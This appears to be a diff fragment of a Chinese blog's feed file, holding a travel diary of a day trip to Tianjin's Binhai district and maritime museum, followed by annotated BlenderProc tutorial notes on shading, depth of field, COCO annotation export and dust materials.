    ​ 远古海洋展厅位于 2 号馆 1 层,展厅面积约 2577 平米,从内外动力、海陆格局、海洋环境、海洋生物的形态特征和演化事件、生态面貌等多方面证据向观众系统而真实地展示地质历史时期的海洋变化。展厅建筑展出化石标本约 642 件,模型 95 件,展项 29 项,场景 8 个,是目前国内展品较全、面积最大的古海洋专题展厅。

    jpg

    ​ 后面又连着一片陆生生物标本🤨。

    15:26 纪念品商店

    jpg

    ​ 花花绿绿的纪念品商店,就是价格感人😅。这里的石头居然是按克计价!

    15:34 出!

    jpg

    ​ 外面再拍一张货船,跟海博馆告别吧!

    15:35 广角的海博馆

    jpg

    ​ 拍了一张广角的海博馆。

    15:40 前往地铁站

    jpg

    ​ 海博馆门口有一堆拉客的出租车司机🫣。我是对这种出租车司机感到畏惧,害怕被宰,但是忻州海军说都是按表计费不至于很坑,于是打车去了会展中心地铁站,11km,¥52。Holy shit! 不过也好,这么一来把天津的出租车、公交车、高铁、地铁、共享电车全部体验了一遍。

    16:25 延边美食

    jpg

    ​ 地铁站门口刚好有一个广场,想着进天津市区还要坐将近两个小时的地铁,就把晚饭解决了吧。价格还算适中,味道也蛮有风味🤗。朝鲜族牛肉汤 + 黑椒蘑菇鸡 + 自助米饭泡菜茶水,两个人¥58。

    16:50 会展中心站

    jpg

    ​ 这个地铁站都修得这么豪华的吗!感觉天津的城建确实比福州厦门要好很多啊,不知道为什么天津的人均 GDP 会这么低🫣。

    17:03 润!

    jpg

    ​ 上车了,这个地铁是在地上跑的🤪。结束了滨海之旅。

    ]]>
    + 前言
            

    因为导师闺女要高考管不了我们,就跟杰哥工作日偷跑天津嘻嘻嘻

    ​ 这篇博客是 6.6 在天津滨海新城带忻州海军看海的流水账🤪!

    正文

    1. 去程高铁

    ​ 高铁票¥79:

    • 07:54 保定东
    • 08:09 白洋淀
    • 08:22 白沟
    • 08:48 胜芳
    • 09:06 天津西
    • 09:30 滨海西

    ​ 第一坑,走的时候才发觉自己背的东西有点重😅。

    07:29 公交车

    jpg

    ​ 规划好 6:40 起床去食堂吃个早饭,然后乘 33/39/70 路公交去保定东站。

    07:33 京畿之门

    jpg

    ​ 京畿之门,又见面了!

    08:07 雄安

    jpg

    ​ 坐高铁的路上经过了雄安,emmmm 没感觉有多牛逼,还是苍茫的华北平原。

    08:18 白洋淀?也许是吧

    jpg

    ​ 这段风景还不错。

    08:58 津了!

    jpg

    ​ 进入天津市,看到一堆火电厂?

    09:06 天津西

    jpg

    ​ 天津西站,又见面了!全国前几大的火车站。

    ​截至 2011 年 6 月,天津西站建筑总面积达 18 万平方米,设计年发送旅客 2367 万人次,最高聚集人数达 5000 人;站场规模为 13 台 26 线。

    09:40 滨海西

    jpg

    ​ 巨大但又没什么人的滨海西站,刚下站就有一堆黑车司机尝试拉我们上车🫣,有当年逛厦门那味了,不愧是旅游城市。

    ​ 但是呢,我已经做好了规划,第一站是乘 934 路 → 128 路 / 124 路 → 133 路去南堤滨海步道公园,¥2 * 2 = 4。拒绝上黑车嘻嘻。

    ​ 中间喜提第二坑,天津公交和滨海公交用的不是一张卡,还好有杰杰🤪。

    2. 滨海妈祖文化园

    09:50 国家自主创新示范区

    jpg

    ​ 看得出滨海新城是天津打算大力发展的一个地方,就跟福州要发展长乐滨海新城一样。天津的滨海新城都成为副省级了啊,牛逼牛逼。

    10:03 厦门路

    jpg

    ​ 乘公交车发现来到了厦门路🤨。天津把全国各个市的名称都作为了路名。

    10:29 下车!

    jpg

    ​ 下车!不得不说北方的路修得是真宽。等公交车的时候无聊看车牌,居然还能看到泉州的车牌🤨。

    10:34 雀巢

    jpg

    ​ 雀巢公司,是一间瑞士跨国食品和饮料公司,总部位于瑞士沃州沃韦,在全球拥有 500 多家工厂。它是世界上最大的食品制造商。最初是以生产婴儿食品起家,后来开始生产巧克力棒和速溶咖啡。

    ​ 雀巢公司门口中国和瑞士的国旗飘飘,这才知道雀巢原来是瑞士的。

    10:44 海

    jpg

    ​ 公交车外的跨海大桥和起重机。

    10:54 执行 plan B

    jpg

    ​ 下车了,导航说离南堤滨海步道公园还有 1.2 公里,这个公里打车太近走路太远,还好有共享单车。

    ​ 天津居然有共享电车😍?于是我跟杰杰说不如直接骑车沿海去一个更大的地方——滨海妈祖文化园。

    11:02 开骑!

    jpg

    ​ 于是开骑!喜提第三坑,杰杰的电车有 bug,一直监测不到头盔佩戴,搞得车供电断断续续的😅。

    11:20 渤海

    jpg

    ​ 广袤无垠的渤海。

    11:52 下车!

    jpg

    ​ 下车,骑行 54min 34s,12km,¥9。喜提第四坑,这个海滩没有沙滩,不需要带拖鞋😅。

    ​ 妈祖文化园,全称天津滨海妈祖文化园区,是一个园区。位于天津滨海新区的汉沽营城镇蔡家堡村滩涂海域,地处滨海旅游区南部填海区域的北堤路与东堤路交汇处,总占地 3.9 万平方米,总建筑面积 4033 平方米,三面环海,景色优美。2008 年由原汉沽区政府与台中县大甲镇澜宫共同合作,选址在汉沽营城镇蔡家堡村滩涂海域,东临天津中心渔港,南临渤海。西临航母主题公园围海东堤,北临海滨大道。全部填海造陆而成,总投资约 40 亿元,着力打造以妈祖文化为主干的集旅游、商业、娱乐、餐饮为一体的综合园区。

    11:56 天后宫

    jpg

    ​ 左鼓楼右钟楼,中间就是天后宫。这才知道为啥福州这么多天后宫,原来是纪念妈祖的庙🤔。

    12:03 各种庙

    jpg

    ​ 里面有点正定古城的味道,反正就是庙。

    12:07 妈祖像

    jpg

    ​ 这个妈祖像有 42m 高,世界第一!

    妈祖的传说

    ​ 妈祖(又称天后、天妃)原名林默,宋建隆元年(公元 960 年)农历 3 月 23 日于福建莆田沿海的一个渔村一一贤良港,她自幼聪颖敏 睿、心地善良,善游泳并能观天象,能为出海渔船指点气候信息,并勇救难,深受人们信任和爱戴,在一次救护海难中她不幸遇难,年仅 28 岁。当时人们不能接受这一事实而宁愿相信她升天,认为她原是天上下凡逐救苦难的神仙。于是,深切缅怀她的人们立庙祭祀并祈求她的佑护,传说这些祈求往往能如愿,尤其是海事更是灵验。于是她成为海内外善男信女心目中的“海上保护神”。从宋代至近代。建庙近 5000 座,信众达 2 亿,妈祖受历代皇帝褒封 36 次,封号有“天后”、“天妃“失人直至“上天圣母”等。关于妈祖的传授也在民间广为流传。今日,妈祖更是成为海峡两岸的“和平使者“。妈祖崇拜已形成内容深广的妈祖文化,成为中华民族优秀文化的一部分。

    ——妈祖像前面的碑文

    12:09 彩旗飘飘

    jpg

    ​ 看完妈祖像,忻州海军去海边瞎玩去了,我在等他的时间里就把之前买好的面包当午餐了🤨,感觉提前在食堂买好卤肉卷或是煎饼会更好些。这边好像没什么车交通不是很便利,还好之前骑过来的共享电车没被人骑走。

    3. 天津 · 国家海洋博物馆

    13:03 海博馆招牌

    jpg

    ​ 骑行 26min 56s,8.3km,¥4.5。这个门票要提前预约但是不要钱,还好我规划完备嘻嘻嘻。

    13:06 海博馆外围

    jpg

    ​ 拍一张海博馆外围。预约的时间段是 13:00—16:30,但是里面非常大,一阵赶路这些时间都是逛不完的。作为一架无情的拍照机器,拍了 254 张照片!

    ​ 写博客的时候才发现还有一些免费的馆没进去逛,西内。

    ​ 天津国家海洋博物馆占地面积 150000 平米,建筑面积 8 万平米,展厅面积共约 2.3 万平方米,建筑主体 3 层局部 4 层,共设六大展区 15 个展厅,包括:海洋自然展区、中华海洋文明展区、海洋互动展区、宣教中心区、海洋生态展区、高端合作及临时展览区,同时设有博物馆商店、餐厅、咖啡厅、影院等公共服务设施。

    13:15 龙的时代

    jpg

    ​ 龙的时代展厅通过展览鱼龙、翼龙化石及霸王龙化石模型揭示海洋是生命的摇篮这一主题。

    13:29 中华海洋文明第三篇章

    jpg

    ​ 展示了许多中国航海器械模型。

    ​ 中华海洋文明第三篇章展厅位于 3 号馆二层,展厅面积 930 平米。展览通过模型、复合沙盘、多媒体、互动展项等方式,展示出我国作为 21 世纪的海洋大国,着眼于中国特色社会主义事业发展全局,统筹国内外两个大局,坚持陆海统筹,坚持走依海富国、以海强国、人海和谐、合作共赢的发展道路,扎实推进海洋强国建设的历程。

    13:39 中华海洋文明第二篇章

    jpg

    ​ 介绍了中国明清的海事历史,这里还能看到很多福建元素🧐。

    ​ 中华海洋文明第二篇章位于 4 号馆二层,展厅面积 1195 平米。展现了明清之际,在禁海与开海的不断争论中,对外贸易与交往的步伐从未停滞。鸦片战争引发了中国人的海洋危机意识,在不屈抗争的同时,国人也积极吸纳西方海洋文明,发展海洋经济,维护海洋权益,探索海洋发展的近代化之路。

    ​ emmm 就是被西方国家胖揍的历史。

    13:58 游轮

    jpg

    ​ 上船¥100 一人,还是算了🫤。

    13:59 飞机

    jpg

    ​ 战斗机模型。

    14:02 海博馆外围

    jpg

    ​ 海博馆外围再转转,又进去了,外面有烧烤项目,但是这价格 emmmm,我宁可不吃午饭也不吃🫤。

    14:27 远古海洋

    jpg

    jpg

    ​ 远古海洋展厅位于 2 号馆 1 层,展厅面积约 2577 平米,从内外动力、海陆格局、海洋环境、海洋生物的形态特征和演化事件、生态面貌等多方面证据向观众系统而真实地展示地质历史时期的海洋变化。展厅建筑展出化石标本约 642 件,模型 95 件,展项 29 项,场景 8 个,是目前国内展品较全、面积最大的古海洋专题展厅。

    jpg

    ​ 后面又连着一片陆生生物标本🤨。

    15:26 纪念品商店

    jpg

    ​ 花花绿绿的纪念品商店,就是价格感人😅。这里的石头居然是按克计价!

    15:34 出!

    jpg

    ​ 外面再拍一张货船,跟海博馆告别吧!

    15:35 广角的海博馆

    jpg

    ​ 拍了一张广角的海博馆。

    15:40 前往地铁站

    jpg

    ​ 海博馆门口有一堆拉客的出租车司机🫣。我是对这种出租车司机感到畏惧,害怕被宰,但是忻州海军说都是按表计费不至于很坑,于是打车去了会展中心地铁站,11km,¥52。Holy shit! 不过也好,这么一来把天津的出租车、公交车、高铁、地铁、共享电车全部体验了一遍。

    16:25 延边美食

    jpg

    ​ 地铁站门口刚好有一个广场,想着进天津市区还要坐将近两个小时的地铁,就把晚饭解决了吧。价格还算适中,味道也蛮有风味🤗。朝鲜族牛肉汤 + 黑椒蘑菇鸡 + 自助米饭泡菜茶水,两个人¥58。

    16:50 会展中心站

    jpg

    ​ 这个地铁站都修得这么豪华的吗!感觉天津的城建确实比福州厦门要好很多啊,不知道为什么天津的人均 GDP 会这么低🫣。

    17:03 润!

    jpg

    ​ 上车了,这个地铁是在地上跑的🤪。结束了滨海之旅。

    ]]>
    @@ -6265,7 +6265,7 @@ /posts/Blender-BlenderProc%20Examples%20overview-Advanced%20Examples/ - 资源

    仓库地址:DLR-RM/BlenderProc: A procedural Blender pipeline for photorealistic training image generation (github.com),下载到本地,用 python 打开,解释器使用之前创建的 blender 环境。

    课程

    Auto shading

    Usage

    blenderproc run examples/advanced/auto_shading/main.py examples/advanced/auto_shading/camera_position examples/advanced/auto_shading/scene.blend examples/advanced/auto_shading/output
    • examples/advanced/auto_shading/main.py: path to the main python file to run.
    • examples/advanced/auto_shading/camera_position: text file with parameters of camera positions.
    • examples/advanced/auto_shading/scene.blend: path to the blend file with the basic scene.
    • examples/advanced/auto_shading/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/auto_shading/output/0.hdf5

    png

    Code

    # Find the object with name "Sphere"
    sphere = bproc.filter.one_by_attr(objs, "name", "Sphere")
    # Set it to AUTO shading, so all angles greater than 45 degrees will be shaded flat.
    sphere.set_shading_mode("auto", 45)

    # Find the object with name "Sphere.001"
    other_sphere = bproc.filter.one_by_attr(objs, "name", "Sphere.001")
    # Set it to smooth shading, so all angles will be shaded flat.
    other_sphere.set_shading_mode("smooth")
    • 通过调用 bproc.filter.one_by_attr(objs, “name”, “Sphere”) 函数找到名为 “Sphere” 的物体,并将其赋值给变量 sphere。

    • 调用 sphere.set_shading_mode(“auto”, 45) 函数,将 sphere 对象的着色模式设置为 AUTO,表示自动根据面的角度决定使用平坦或平滑着色。同时给定一个阈值参数 45,即当面的角度大于 45 度时,该面将使用平坦着色,否则使用平滑着色。

    • 通过调用 bproc.filter.one_by_attr(objs, “name”, “Sphere.001”) 函数找到名为 “Sphere.001” 的物体,并将其赋值给变量 other_sphere。

    • 调用 other_sphere.set_shading_mode(“smooth”) 函数,将 other_sphere 对象的着色模式设置为 SMOOTH,表示所有面都使用平滑着色。

    Camera Depth of Field

    Usage

    blenderproc run examples/advanced/camera_depth_of_field/main.py examples/resources/scene.obj examples/advanced/camera_depth_of_field/output
    • examples/advanced/camera_depth_of_field/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/camera_depth_of_field/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/camera_depth_of_field/output/0.hdf5

    png

    Code

    设置视点:

    # Create an empty object which will represent the cameras focus point
    focus_point = bproc.object.create_empty("Camera Focus Point")
    focus_point.set_location([0.5, -1.5, 3])
    # define the camera intrinsics
    bproc.camera.set_resolution(512, 512)
    # Set the empty object as focus point and set fstop to regulate the sharpness of the scene
    bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25)

    首先,通过调用 bproc.camera.set_resolution(512, 512) 函数设置相机分辨率为 512x512 像素。

    接着,通过调用 bproc.camera.add_depth_of_field(focus_point, fstop_value=0.25) 函数来添加景深效果。其中,focus_point 表示景深的焦点,即相机聚焦的对象(通常为场景中心)。fstop_value 参数控制景深的浅深范围,值越小,景深效果越明显。在本例中,fstop_value 被设置为 0.25,表明所拍摄的场景会呈现出比较明显的景深效果。

    COCO annotations

    Usage

    blenderproc run examples/advanced/coco_annotations/main.py examples/resources/camera_positions examples/advanced/coco_annotations/scene.blend examples/advanced/coco_annotations/output
    • examples/advanced/coco_annotations/main.py: path to the main python file to run.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/advanced/coco_annotations/scene.blend: path to the blend file with the basic scene.
    • examples/advanced/coco_annotations/output: path to the output directory.

    Visualization

    使用 blenderproc 可视化 COCO 数据集格式的命令示例:

    blenderproc vis coco [-i <image index>] [-c <coco annotations json>] [-b <base folder of coco json and image files>]

    生成 COCO 数据集形式的文件:

    png

    coco_annoatations.json 里的内容(感觉存了一段乱七八糟的东西):

    {
    "info": {
    "description": "coco_annotations",
    "url": "https://github.com/waspinator/pycococreator",
    "version": "0.1.0",
    "year": 2020,
    "contributor": "Unknown",
    "date_created": "2023-06-04 23:59:39.563796"
    },
    "licenses": [
    {
    "id": 1,
    "name": "Attribution-NonCommercial-ShareAlike License",
    "url": "http://creativecommons.org/licenses/by-nc-sa/2.0/"
    }
    ],
    "categories": [
    {
    "id": 1,
    "supercategory": "coco_annotations",
    "name": "Suzanne"
    },

    ...

    {
    "id": 9,
    "supercategory": "coco_annotations",
    "name": "Cube.001"
    }
    ],
    "images": [
    {
    "id": 0,
    "file_name": "images/000000.jpg",
    "width": 512,
    "height": 512,
    "date_captured": "2023-06-04 23:59:39.563796",
    "license": 1,
    "coco_url": "",
    "flickr_url": ""
    },
    {
    "id": 1,
    "file_name": "images/000001.jpg",
    "width": 512,
    "height": 512,
    "date_captured": "2023-06-04 23:59:39.672089",
    "license": 1,
    "coco_url": "",
    "flickr_url": ""
    }
    ],
    "annotations": [
    {
    "id": 1,
    "image_id": 0,
    "category_id": 1,
    "iscrowd": 0,
    "area": 8330,
    "bbox": [
    184,
    98,
    144,
    114
    ],
    "segmentation": {
    "counts": [
    94341,

    ...

    94583
    ],
    "size": [
    512,
    512
    ]
    },
    "width": 512,
    "height": 512
    },

    ...

    {
    "id": 16,
    "image_id": 1,
    "category_id": 9,
    "iscrowd": 0,
    "area": 25473,
    "bbox": [
    0,
    456,
    512,
    56
    ],
    "segmentation": {
    "counts": [
    460,

    ...

    34
    ],
    "size": [
    512,
    512
    ]
    },
    "width": 512,
    "height": 512
    }
    ]
    }

    在本例中:

    blenderproc vis coco -i 1 -c coco_annotations.json -b examples/advanced/coco_annotations/output/coco_data

    然后你就会喜提报错:

    AttributeError: module 'numpy' has no attribute 'bool'.
    `np.bool` was a deprecated alias for the builtin `bool`. To avoid this error in existing code, use `bool` by itself. Doing this will not modify any behavior and is safe. If you specifically wanted the numpy scalar type, use `np.bool_` here.
    The aliases was originally deprecated in NumPy 1.20; for more details and guidance see the original release note at:
    https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations. Did you mean: 'bool_'?

    vis_coco_annotation.py 里找到这行 np.bool_,把它改成 bool_

    png

    重新开跑!

    png

    Code

    # Set some category ids for loaded objects
    for j, obj in enumerate(objs):
    obj.set_cp("category_id", j + 1)

    要创建 COCO 标注,我们需要渲染实例和类别映射。类别是根据自定义属性 “category_id” 定义的,该属性必须为每个实例预先定义。可以像上面一样通过自定义属性或在加载器中设置 category_id,也可以直接在 .blend 文件中定义。同时,我们还将 “name” 添加到映射中,以便稍后在 COCO 标注写入器中使用对象的名称为类别进行标记。


    bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])

    调用 bproc.renderer.enable_segmentation_output(map_by=[“category_id”, “instance”, “name”]) 函数激活分割渲染功能。

    其中,“category_id”、“instance” 和 “name” 分别表示三种不同的标记方式,即按类别、物体实例和名称进行标记。

    这个函数的作用是将场景中的每个物体按照所选的标记方式标记,并将标记信息存储到渲染结果中。例如,如果选择 “category_id” 标记,则每个物体会被分配一个唯一的整数 ID,表示其所属的类别。


    # Write data to coco file
    bproc.writer.write_coco_annotations(os.path.join(args.output_dir, 'coco_data'),
    instance_segmaps=data["instance_segmaps"],
    instance_attribute_maps=data["instance_attribute_maps"],
    colors=data["colors"],
    color_file_format="JPEG")

    使用 bproc.writer.write_coco_annotations()生成 COCO 数据集。

    此函数将注释存储在 coco_annotations.json 中。可选地,您可以在 writer.CocoAnnotationsWriter 配置中设置 "supercategory": "<some_supercategory>",以通过先前分配的自定义属性 "supercategory" 过滤对象。

    通过调用 bproc.writer.write_coco_annotations() 函数将场景中的分割信息和属性信息写入 COCO 格式的注释文件中。

    其中:

    • os.path.join(args.output_dir, ‘coco_data’) 是注释文件的保存路径
    • instance_segmaps、instance_attribute_maps 和 colors 分别表示物体实例分割图、物体属性图和物体颜色信息,这些信息都是从渲染结果中提取得到的
    • color_file_format 参数表示颜色信息保存格式,这里被设置为 JPEG 格式。
    • 此函数会自动将提供的分割信息和属性信息转换为 COCO 格式,并将其保存到指定路径下的注释文件中。

    bproc.writer.write_coco_annotations()

    def write_coco_annotations(output_dir: str, instance_segmaps: Optional[List[np.ndarray]] = None,
    instance_attribute_maps: Optional[List[dict]] = None,
    colors: Optional[List[np.ndarray]] = None, color_file_format: str = "PNG",
    mask_encoding_format: str = "rle", supercategory: str = "coco_annotations",
    append_to_existing_output: bool = True, segmap_output_key: str = "segmap",
    segcolormap_output_key: str = "segcolormap", rgb_output_key: str = "colors",
    jpg_quality: int = 95, label_mapping: Optional[LabelIdMapping] = None,
    file_prefix: str = "", indent: Optional[Union[int, str]] = None):

    此函数按以下步骤编写 COCO 注释:

    1. 定位分割图像
    2. 定位 RGB 映射
    3. 定位 seg mappings
    4. 读取颜色映射
    5. 对于每个帧,编写 coco 注释

    参数解释如下:

    • output_dir:输出目录,用于编写 coco 注释
    • instance_segmaps:实例分割映射的列表
    • instance_attribute_maps:每帧的映射,具有 idx、class 和(可选)supercategory/bop_dataset_name
    • colors:颜色图像的列表。不支持立体图像,请依次输入左和右输入。
    • color_file_format:保存颜色图像的格式
    • mask_encoding_format:二进制掩模的编码格式。默认值为 ‘rle’。可用值:‘rle’、‘polygon’
    • supercategory:要过滤的数据集/超类别名称,例如通过 ‘bop_dataset_name’ 设定的特定 BOP 数据集集合或具有指定 ‘cp_supercategory’ 的任何已加载对象
    • append_to_existing_output:如果为 true,且输出目录中已经有 coco_annotations.json 文件,则新的 coco 注释将被追加到现有文件中。此外,rgb 图像将被命名,以避免冲突。
    • segmap_output_key:分割图像的输出键。应该与 SegMapRenderer 模块的输出键相同。默认值为 ‘segmap’。
    • segcolormap_output_key:为对象名称/类别对应关系注册 CSV 文件的输出键。应该与 SegMapRenderer 模块的 colormap_output_key 相同。默认值为 ‘segcolormap’。
    • rgb_output_key:RGB 图像的输出键。应该与 RgbRenderer 模块的输出键相同。默认值为 ‘colors’。
    • jpg_quality:所需的 jpg 编码质量级别
    • label_mapping:用于基于其 ID 对类别进行标记的标签映射。如果未给定 None,则使用 csv 文件中的 name 字段,或者(如果不存在)使用类别 ID 本身。
    • file_prefix:图像文件名的可选前缀
    • indent:如果缩进是非负整数或字符串,则注释输出将以该缩进级别进行漂亮的打印。缩进级别为 0、负数或 “” 仅插入换行符。None(默认值)选择最紧凑的表示。使用正整数缩进每个层级缩进那么多空格。如果缩进是字符串(例如 “\t”),那么该字符串用于缩进每个级别。

    # 对传入的三个可选参数进行类型检查和处理,确保它们都是列表类型。如果为 None,就改为空列表
    instance_segmaps = [] if instance_segmaps is None else list(instance_segmaps)
    colors = [] if colors is None else list(colors)
    #(怎么代码风格跟上面的不太一样?)
    if instance_attribute_maps is None:
    instance_attribute_maps = []

    # 检查 colors[0] 是否是四维数组,如果是,则抛出 ValueError 异常。这是因为 BlenderProc 目前不支持渲染立体图像,只能生成左右视图分别的图像/分割图像。
    if len(colors) > 0 and len(colors[0].shape) == 4:
    raise ValueError("BlenderProc currently does not support writing coco annotations for stereo images. "
    "However, you can enter left and right images / segmaps separately.")

    # Create output directory
    # 创建输出目录,其中 'images' 目录用于存储转换后的图像。如果该目录已经存在,则不会创建新目录。
    os.makedirs(os.path.join(output_dir, 'images'), exist_ok=True)

    # 这些代码块用于查找渲染时生成的 RGB 图像、实例分割图像和属性映射文件的路径
    if not instance_segmaps:
    # 如果 instance_segmaps 列表是空的,则该代码会查找实例分割图像的路径,使用 Utility.find_registered_output_by_key() 方法查找已注册的输出
    # Find path pattern of segmentation images
    segmentation_map_output = Utility.find_registered_output_by_key(segmap_output_key)
    if segmentation_map_output is None:
    # 如果找不到 key 为 segmap_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 SegMapRenderer 模块
    raise RuntimeError(f"There is no output registered with key {segmap_output_key}. Are you sure you "
    f"ran the SegMapRenderer module before?")

    if not colors:
    # Find path pattern of rgb images
    # 如果 colors 列表为空,则该代码会查找 RGB 图像的路径
    rgb_output = Utility.find_registered_output_by_key(rgb_output_key)
    if rgb_output is None:
    # 如果找不到 key 为 rgb_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 RgbRenderer 模块
    raise RuntimeError(f"There is no output registered with key {rgb_output_key}. Are you sure you "
    f"ran the RgbRenderer module before?")

    if not instance_attribute_maps:
    # Find path of name class mapping csv file
    # 如果 instance_attribute_maps 列表为空,则该代码会查找实例分割图像到名称、类别标签的映射文件的路径
    segcolormap_output = Utility.find_registered_output_by_key(segcolormap_output_key)
    if segcolormap_output is None:
    # 如果找不到 key 为 segcolormap_output_key 的输出,则引发 RuntimeError 异常,提示用户在运行 write_coco_annotations() 函数之前先运行 SegMapRenderer 模块,并将 map_by 参数设置为 instance
    raise RuntimeError(f"There is no output registered with key {segcolormap_output_key}. Are you sure you "
    f"ran the SegMapRenderer module with 'map_by' set to 'instance' before?")

    # 用于确定输出的 COCO 格式注释文件的路径,并在需要追加输出时计算图像编号的偏移量
    coco_annotations_path = os.path.join(output_dir, "coco_annotations.json")
    # Calculate image numbering offset, if append_to_existing_output is activated and coco data exists
    if append_to_existing_output and os.path.exists(coco_annotations_path):
    # 如果 append_to_existing_output 为 True,且文件系统中存在名为 'coco_annotations.json' 的文件,则将其加载到内存中
    with open(coco_annotations_path, 'r', encoding="utf-8") as fp:
    existing_coco_annotations = json.load(fp)
    # 获取已存在图像 ID 的最大值,并加 1 作为图像编号的偏移量。这可以确保新生成的注释不会与已有的注释文件重复。
    image_offset = max(image["id"] for image in existing_coco_annotations["images"]) + 1
    else:
    # 如果 append_to_existing_output 参数为 False 或没有找到现有的注释文件,则图像编号的偏移量为 0,并且 existing_coco_annotations 变量设置为 None
    image_offset = 0
    existing_coco_annotations = None

    # collect all RGB paths
    new_coco_image_paths = []
    # collect all mappings from csv (backwards compat)
    segcolormaps = []
    # collect all instance segmaps (backwards compat)
    inst_segmaps = []

    # for each rendered frame
    # 遍历从 bpy.context.scene.frame_start 到 bpy.context.scene.frame_end 的每一帧
    for frame in range(bpy.context.scene.frame_start, bpy.context.scene.frame_end):

    # 如果 instance_attribute_maps 列表为空,则读取映射文件(segcolormap_output)以获取对象名称/类别到整数的映射,将其存储在 segcolormaps 列表中
    if not instance_attribute_maps:
    # read colormappings, which include object name/class to integer mapping
    segcolormap = []
    with open(segcolormap_output["path"] % frame, 'r', encoding="utf-8") as csvfile:
    reader = csv.DictReader(csvfile)
    for mapping in reader:
    segcolormap.append(mapping)
    segcolormaps.append(segcolormap)

    # 如果 instance_segmaps 列表为空,则读取分割图像文件(segmentation_map_output)并提取实例通道(即 channel_instance),将实例分割图像存储在 inst_segmaps 列表中
    if not instance_segmaps:
    # Load segmaps (backwards compat)
    segmap = np.load(segmentation_map_output["path"] % frame)
    inst_channel = int(segcolormap[0]['channel_instance'])
    inst_segmaps.append(segmap[:, :, inst_channel])

    # 如果 colors 列表非空,则该代码调用 opencv 库的 imwrite() 函数将 RGB 图像(颜色渲染图像)写入目标路径,具体路径由 file_prefix 和偏移量计算得到
    if colors:
    color_rgb = colors[frame - bpy.context.scene.frame_start]

    # Reverse channel order for opencv
    color_bgr = color_rgb.copy()
    color_bgr[..., :3] = color_bgr[..., :3][..., ::-1]

    if color_file_format == 'PNG':
    target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.png'
    target_path = os.path.join(output_dir, target_base_path)
    cv2.imwrite(target_path, color_bgr)
    elif color_file_format == 'JPEG':
    target_base_path = f'images/{file_prefix}{frame + image_offset:06d}.jpg'
    target_path = os.path.join(output_dir, target_base_path)
    cv2.imwrite(target_path, color_bgr, [int(cv2.IMWRITE_JPEG_QUALITY), jpg_quality])
    else:
    raise RuntimeError(f'Unknown color_file_format={color_file_format}. Try "PNG" or "JPEG"')

    else:
    # 如果没有特定的颜色方案,则直接复制 RGB 渲染图像到目标路径
    source_path = rgb_output["path"] % frame
    target_base_path = os.path.join('images',
    file_prefix + os.path.basename(rgb_output["path"] % (frame + image_offset)))
    target_path = os.path.join(output_dir, target_base_path)
    shutil.copyfile(source_path, target_path)

    # 将目标路径(target_path)添加到 new_coco_image_paths 数组中,并在 COCO 格式注释中使用这个数组
    new_coco_image_paths.append(target_base_path)

    instance_attribute_maps = segcolormaps if segcolormaps else instance_attribute_maps
    instance_segmaps = inst_segmaps if inst_segmaps else instance_segmaps

    coco_output = _CocoWriterUtility.generate_coco_annotations(instance_segmaps,
    instance_attribute_maps,
    new_coco_image_paths,
    supercategory,
    mask_encoding_format,
    existing_coco_annotations,
    label_mapping)

    print("Writing coco annotations to " + coco_annotations_path)
    with open(coco_annotations_path, 'w', encoding="utf-8") as fp:
    json.dump(coco_output, fp, indent=indent)

    这段代码将收集到的实例分割图像、属性映射文件、图像路径和其他参数传递给 _CocoWriterUtility.generate_coco_annotations() 函数,生成符合 COCO 格式的注释。如果存在旧的 COCO 格式的注释(即 existing_coco_annotations),则将其合并到生成的注释中。

    最后,将这些注释写入给定的 coco_annotations_path 文件中,并在控制台中输出写入的文件路径。

    Diffuse color image

    Usage

    blenderproc run examples/advanced/diffuse_color_image/main.py examples/resources/scene.obj examples/advanced/diffuse_color_image/output
    • examples/advanced/diffuse_color_image/main.py: path to the main python file to run.
    • examples/resources/scene.obj: path to the object file with the basic scene.
    • examples/advanced/diffuse_color_image/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/advanced/diffuse_color_image/output/0.hdf5

    png

    Code

    # Also enable the diffuse color image, which describes the base color of the textures
    bproc.renderer.enable_diffuse_color_output()

    How to apply dust to objects

    Usage

    blenderproc run examples/advanced/dust/main.py resources/haven/models/ArmChair_01/ArmChair_01_2k.blend resources/haven examples/datasets/haven/output
    • examples/advanced/dust/main.py: path to the main python file to run.
    • resources/haven/models/ArmChair_01/ArmChair_01.blend: Path to the blend file, from the haven dataset, browse the model folder, for all possible options
    • resources/haven: The folder where the hdri folder can be found, to load an world environment
    • examples/datasets/haven/output: path to the output directory.

    这玩意儿老是坑,妈的

    Little Paris Eiffel Tower HDRI • Poly Haven 里下载一些 Models 和 HDRIS:

    png

    这个网站的资源都是开源免费的,不错啊!

    png

    png

    设置好路径开跑!

    blenderproc run examples/advanced/dust/main.py resources/haven/models/GreenChair_01_4k.blend D:\Study\1st-year-master\Code\BlenderProc-main\resources\haven  examples/datasets/haven/output

    然后就寄,不明白为什么这里 glob.glob 会返回空列表,换个代码重写,然后这坨臭臭代码就能跑了。

    png

    Visualization

    blenderproc vis hdf5 examples/datasets/haven/output/0.hdf5

    png

    Code

    # load the objects into the scene
    obj = bproc.loader.load_blend(args.model)[0]

    haven_hdri_path = bproc.loader.get_random_world_background_hdr_img_path_from_haven(args.hdri_path)
    bproc.world.set_world_background_hdr_img(haven_hdri_path)
    1. 使用 bproc.loader.load_blend(args.model) 函数加载在 args.model 变量中指定的 Blender 模型文件。该函数返回一个对象列表,我们将其中的第一个对象存储在变量 obj 中。
    2. 使用 bproc.loader.get_random_world_background_hdr_img_path_from_haven(args.hdri_path) 函数从指定的路径中获取一个随机的 HDR 图像文件路径。该函数会检查 args.hdri_path 目录下的所有 .hdr 文件,并从中随机选择一个返回。
    3. 最后,使用 bproc.world.set_world_background_hdr_img(haven_hdri_path) 函数,将选择的 HDR 图像文件路径设置为 Blender 环境的背景图像。这使得 3D 模型文件与所选择的 HDR 图像组合成为一个逼真的场景。

    # Add dust to all materials of the loaded object
    for material in obj.get_materials():
    bproc.material.add_dust(material, strength=0.8, texture_scale=0.05)

